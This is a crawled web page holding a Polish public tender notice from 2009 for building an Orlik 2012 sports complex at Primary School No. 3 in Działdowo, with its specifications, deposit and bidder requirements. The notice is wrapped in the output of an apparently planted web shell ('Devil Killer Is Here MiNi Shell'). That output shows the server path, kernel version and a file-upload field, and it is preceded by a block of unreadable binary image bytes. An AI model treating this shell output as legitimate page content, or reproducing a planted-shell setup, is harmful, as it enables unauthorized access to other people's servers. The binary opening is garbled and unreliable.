JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090515/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090515/151576-N-2009.html

<p class="kh_header"><b>Działdowo: budowa kompleksu sportowego w ramach programu Moje Boisko-Orlik 2012 przy Szkole podstawowej Nr 3 w Działdowie,</b><br>
<b>Numer ogłoszenia: 151576 - 2009; data zamieszczenia: 15.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta Działdowo , ul. Zamkowa 12, 13-200 Działdowo, woj. warmińsko-mazurskie, tel. 023 6970450, faks 023 6970402.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> budowa kompleksu sportowego w ramach programu Moje Boisko-Orlik 2012 przy Szkole podstawowej Nr 3 w Działdowie,.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Budowa kompleksu sportowego w ramach programu  Moje Boisko-Orlik 2012 przy Szkole Podstawowej Nr 3 w Działdowie, ul. Lenartowicza 1
Rodzaj zamówienia : roboty budowlan2
Przedmiot zamówienia:
1. Roboty przygotowawcze
  a. Rozbiórka boiska z asfaltobetonu oraz płytek betonowych:  
                       - pow. asfaltobetonu - 1021,18m2,
                       - pow. płytek betonowych - 567,00m2.
  b. Rozbiórka ogrodzenia z siatki:
                      - długość ogrodzenia do rozbiórki - 30,91m.
2.Budowa boiska do piłki nożnej o wymiarach 30,0 m x 62,0m o pow. całkowitej 1860m2 - pole gry 26,0 x 56,0 m
- podbudowa przepuszczalna
  - nawierzchnia do piłki nożnej - sztuczna trawa
Wysokość włókna min. 60 mm na podbudowie z kruszywa -wypełnienie z trawy zgodnie z badaniem specjalistycznego laboratorium np. Labosport
1.	Typ włókna: monofil,
2.	Skład chemiczny włókna; polietylen,
3.	Ciężar włókna: min. 11.000 Dtex,
4.	Gęstość trawy: min. 97.000 włókien/m2
Nawierzchnia syntetyczna typu sztuczna trawa o właściwościach i technologii układania określonych w dokumentacji projektowej - załącznik nr 3 do SIWZ i SST załącznik nr 2 do SIWZ
- Obrzeża betonowe na ławie betonowej oddzielające sąsiednie elementy terenu od płyty boiska 
Wszystkie elementy zgodne  właściwościami określonymi w dokumentacji technicznej.
Roboty należy wykonać zgodnie z dokumentacją projektową - załącznik nr 3 do SIWZ i SST - załącznik nr 2 do SIWZ   
Wyposażenie
- bramki aluminiowe mocowane w tulejach - 2 sztuki
- siatki do bramek                                 - 2 sztuki
3. Budowę boiska wielofunkcyjnego o wymiarach 19,1 x 32,1 m o powierzchni 613,11m2 - pole do gry 15,1 x 28,1 m
Podbudowa:
I Wariant
Podbudowa przepuszczalna        
Wszystkie elementy  zgodne z  właściwościami określonymi w dokumentacji projektowej -załącznik nr 3 do SIWZ.
Roboty należy wykonać zgodnie z dokumentacją projektową -załącznik nr 3 do SIWZ do i SST - załącznik nr 2 do SIWZ.    		
Nawierzchnia boiska wielofunkcyjnego
nawierzchnia poliuretanowa wykonana  o właściwościach i technologii układania określonych w dokumentacji projektowej - załącznik nr 3 do SIWZ i SST.-załącznik nr 2 do SIWZ
Technologia układania nawierzchni:
II Sposób: Technologia typu NATRYSK - na podbudowie z kruszywa kamiennego instaluje się warstwę przepuszczalną dla wody i warstwę stabilizującą typu ET.  Następnie warstwę gr. 10-11 mm z granulatu SBR, następnie warstwę natrysku mieszanka granulatu EPDM zmieszana z PU o grubości 2-3mm.
Wyposażenie do piłki koszykowej
- obręcz do koszykówki standard i siatka do obręczy - 2 sztuki
- tablica do koszykówki epoksydowa o wym. 105 x 180cm  - 2 sztuki
- mechanizm regulacji wysokości  - 2 sztuki
- konstrukcja do koszykówki dwusłupowa, montowana w tulejach  - 2 sztuki
Wyposażenie  do piłki siatkowej
- słupki do siatkówki, aluminiowe wielofunkcyjne badminton, tenis, siatkówka-2 sztuki
- siatka do siatkówki  - 1 sztuki
4. Ogrodzenie terenu
Szczegółowe rozwiązania wg dokumentacji projektowej -załącznik nr 3 do SIWZ oraz SST - załącznik nr 2 do SIWZ
5. Oświetlenie terenu 
Oświetlenie boisk będą stanowiły projektory zamocowane na 10 masztach o wysokości min. 9m. Oświetlenie ciągów komunikacyjnych wykonać na 2 słupach stalowych okrągłych o wysokości 8 m z oprawami JET2 kl.II 150W HPS-T na wysięgnikach rurowych 100/100 Szczegółowe rozwiązania wg dokumentacji projektowej - załącznik nr 3 do SIWT oraz SST -załącznik nr 2 do SIWZ.
6. Chodniki
Ciągi komunikacyjne i powierzchnia przeznaczona pod kontener na odpadki stałe- kostka polbrukowa gr. 8 cm, na podbudowie z piasku i kruszywa, zamknięta obrzeżem betonowym. Szczegółowe rozwiązania wg dokumentacji projektowej -załącznik nr 3 do SIWZ oraz SST - zał. Nr 2 do SIWZ.
7.  Budowa budynku zaplecza socjalnego
Fundamenty Zbrojenie 34GS A-III 4x12mm, strzemiona 20x20cm St0 A-0 6mm co 30cm, beton B-20.Głębokość przemarzania - 1,0m p.p.t. - poziom posadowienia zgodnie   z istniejącymi stopami fundamentowymi pod słupy.
Izolacja cieplna fundamentów styropianem FS-20 gr. 12cm, tynk silikonowy na siatce  syntetycznej.
Izolacja pionowa: masa dyspersyjna asfaltowo-kauczukowa na wys. 0,3m n.p.t..
Izolacja pozioma: 2 x papa na lepiku.
Ściany  Ściany zewnętrzne z bloczków gazobetonowych odm. 600 na zaprawie klejowo- cementowej, ocieplone styropianem FS-15 o gr. 15cm, gr. 28cm
Ścianki działowe z gazobetonu odm. 600 na zaprawie klejowo-cementowej, gr. 12cm
Podłoga -wewnątrz:
 - płytki anty poślizgowe gres na zaprawie klejowej, gr. 1cm,
 - posadzka cementowa, gr. 5cm,
- 2 x folia izolacyjna,- styropian FS-20, gr. 8cm,- beton B-10, gr. 10cm,
 - piasek, gr.10cm,- grunt zagęszczony Id=0,65.
 zewnątrz: - gres antypoślizgowy, gr. 1cm, - posadzka cementowa, gr. 5cm,
- 2 x folia izolacyjna,- beton B-10, gr. 10cm,- piasek, gr.10cm, - grunt zagęszczony Id=0,65
8.  Instalacje 
 - instalacja wodociągowa  i kanalizacyjna, ciepłej wody użytkowej
 - instalacja centralnego ogrzewania
 - instalacja elektryczna
 Szczegółowy opis przedmiotu zamówienia stanowią załączniki 

Załącznik Nr 1 do SIWZ	  Specyfikacja techniczna wykonania i odbioru robót
Załącznik Nr 2 do SIWZ	Szczegółowe Specyfikacje Techniczne wykonania i odbioru robót 
Załącznik Nr 3 do SIWZ	 Dokumentacja projektowa
Załącznik Nr 4 do SIWZ	Przedmiar robót
Wymagany okres gwarancji na wykonane roboty ( materiały i robociznę) wynosi 
36 miesięcy od dnia odebrania przez Zamawiającego robót budowlanych i podpisania (bez uwag) protokołu końcowego.
Wymagany okres gwarancji na trawę syntetyczną - 60 miesięcy 
Zamawiający nie dopuszcza złożenia ofert częściowych..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.21-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości  15 000 zł słownie złotych: piętnaście tysięcy złotych.
Wadium należy wnieść w formach przewidzianych w art. 45 ust. 6 ustawy, tj.:
1 pieniądzu,
2 poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3 gwarancjach bankowych,
4 gwarancjach ubezpieczeniowych,
5 poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dna 9 listopada 2000r., o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości Dz.U. Nr z 2007 Nr 42, poz. 275
Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.
Wadium w pieniądzu należy wnieść na konto Zamawiającego:
Bank PKO BP SA
Nr 08 1020 3583 0000 3302 0011 3696
W przypadku wadium wnoszonego w pieniądzu za termin wniesienia uznaje się chwilę uznania kwoty na rachunku Zamawiającego.
 W przypadku wniesienia wadium w formie innej niż pieniądz - oryginał dokumentu potwierdzającego wniesienie wadium należy złożyć przed upływem terminu składania ofert w siedzibie Zamawiającego u Pani Małgorzaty Kłosowskiej w  pok. Nr 14 lub zamieścić w osobnej kopercie - opisanej wadium dołączonej do oferty.
Nie wniesienie wadium w terminie lub w sposób określony w SIWZ spowoduje wykluczenie Wykonawcy na podstawie art. 24 ust. 2 pkt 4 ustawy, a jego oferta zostanie odrzucona na podstawie art. 24 ust. 4 ustawy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki  
          określone w art. 22 ust. 1  ustawy Pzp. 
 Spełnienie warunków udziału odnoszących się do posiadania niezbędnej wiedzy i 
  doświadczenia,  dysponowania  osobami zdolnymi do wykonania zamówienia oraz
  sytuacji finansowej i ekonomicznej zostanie ocenione według poniższych zasad :
1. udokumentowane należyte wykonanie, w ciągu ostatnich 5 lat przed dniem wszczęciem postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, robót budowlanych polegających na budowie boisk sportowych CPV 45 21 22 21-1, w tym: jednego boiska piłkarskiego z nawierzchnią z trawy syntetycznej i jednego boiska z nawierzchnią poliuretanową z podaniem ich wartości, dat wykonania oraz odbiorców. 
2.dysponowaniem w celu wykonania zamówienia przynajmniej 1 osobą posiadającą uprawnienia do kierowania robotami budowlanymi o specjalności:
a. konstrukcyjno-budowlanej, 
b.instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, 
c.instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych.
3. ubezpieczenie Wykonawcy od odpowiedzialności cywilnej w zakresie prowadzonej działalności o wartości nie mniejszej niż 500 000 PLN. 
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wymaganych przez Zamawiającego i podanych w SIWZ dołączonych do oferty. Z treści załączonych dokumentów i oświadczeń musi wynikać jednoznacznie, iż Wykonawca spełnia wyżej wymienione warunki.
 Zamawiający wezwie Wykonawców, którzy w określonym terminie nie złożyli oświadczeń i dokumentów potwierdzających spełnianie warunków udziału w postępowaniu lub, którzy złożyli dokumenty zawierające błędy, do ich uzupełnienia w wyznaczonym terminie chyba, że mimo ich uzupełnienia konieczne byłoby unieważnienie postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 - Wykonawca składa oświadczenia, których wzór stanowią Załącznik Nr 6 oraz Załącznik Nr 7 do  SIWZ.
W celu potwierdzenia, że Wykonawca posiada uprawnienia do określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy Prawo zamówień publicznych:
1. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
2. Aktualne zaświadczenia właściwego naczelnika Urzędu Skarbowego, oraz oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
W celu potwierdzenia opisanego przez Zamawiającego warunku posiadania przez Wykonawcę niezbędnej wiedzy i doświadczenia:
3. Wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego tj. datą publikacji ogłoszenia o zamówieniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, robót budowlanych polegających na budowie boisk sportowych CPV 45 21 22 21-1, w tym: jednego boiska piłkarskiego  o nawierzchni z trawy syntetycznej i jednego boiska z nawierzchnią poliuretanową  z podaniem ich wartości, przedmiotu oraz daty i miejsca wykonania wzór stanowi Załącznik Nr 5 do SIWZ. Do wykazu Wykonawca musi również dołączyć dokumenty potwierdzające, że roboty te zostały wykonane należycie -referencje, protokoły odbioru, itp., 
4. Dokumenty potwierdzające posiadanie uprawnień budowlanych do kierowania robotami budowlanymi w specjalnościach: 1 konstrukcyjno-budowlanej, 2  instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, 3  instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych.
oraz zaświadczenie zaświadczenia, wydane przez właściwą izbę samorządu  zawodowego, potwierdzające wpis danej osoby na listę członków właściwej izby
 dokumenty mogą być przedstawione w postaci kserokopii poświadczonych za zgodność z oryginałem.
W celu potwierdzenia opisanego przez Zamawiającego warunku znajdowania się przez Wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia:
5. Polisa, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie działalności zgodnej z przedmiotem zamówienia o wartości nie mniejszej niż 500 000 PLN
Przy składaniu ofert przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia Wykonawcy mogą złożyć jedną wspólną polisę potwierdzającą, że wszyscy Wykonawcy są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej.
6. Wykaz oświadczeń lub dokumentów potwierdzających spełnienie warunków  jakościowych
A. Dokumenty dotyczące nawierzchni poliuretanowej:
1.Certyfikat lub deklaracja zgodności z normą PN-EN 14877:2008, lub 
aprobata techniczna ITB, lub rekomendacja techniczna ITB, lub 
wyniki badań specjalistycznego laboratorium potwierdzające parametry oferowanej nawierzchni np. Labosport, lub dokument równoważny.
2.Karta techniczna oferowanej nawierzchni potwierdzona przez jej producenta.
3.Atest PZH dla oferowanej nawierzchni.
4.Autoryzacja producenta nawierzchni poliuretanowej, wystawiona dla wykonawcy na realizowaną inwestycję wraz z potwierdzeniem gwarancji udzielonej przez producenta na tą nawierzchnię.
B.Dokumenty dotyczące nawierzchni z trawy syntetycznej:
1.Raport z badań przeprowadzonych przez laboratorium Labosport lub ISA-Sport lub Sports Labs Ltd, dotyczący oferowanej nawierzchni, potwierdzający zgodność jej parametrów z Handbook of Test Methods for Football Turf dostępny na FIFA.com.
2.Certyfikat lub deklaracja zgodności z normą PN-EN 15330-1:2008, lub
aprobata techniczna ITB, lub rekomendacja techniczna ITB, lub
wyniki badań specjalistycznego laboratorium potwierdzające parametry oferowanej nawierzchni np. Labosport, ISA-Sport, Sports Labs Ltd lub dokument równoważny. 
3.Karta techniczna oferowanej nawierzchni potwierdzona przez jej producenta.
4.Atest PZH dla oferowanej nawierzchni.
5.Autoryzacja producenta trawy syntetycznej, wystawiona dla wykonawcy na realizowaną inwestycję wraz z potwierdzeniem gwarancji udzielonej przez producenta na tą nawierzchnię.
Zamawiający dokona oceny spełniania warunków na podstawie wymaganych dokumentów i oświadczeń w oparciu o zasadę - spełnia- nie spełnia..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.dzialdowo.um.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Działdowo
13-200 działdowo
ul. Zamkowa 12
pok. nr 20.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.06.2009 godzina 10:00, miejsce: Ofertę należy złożyć w budynku Zamawiającego, ul. Zamkowa 12, pokój nr 1 Biuro Obsługi Klienta.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com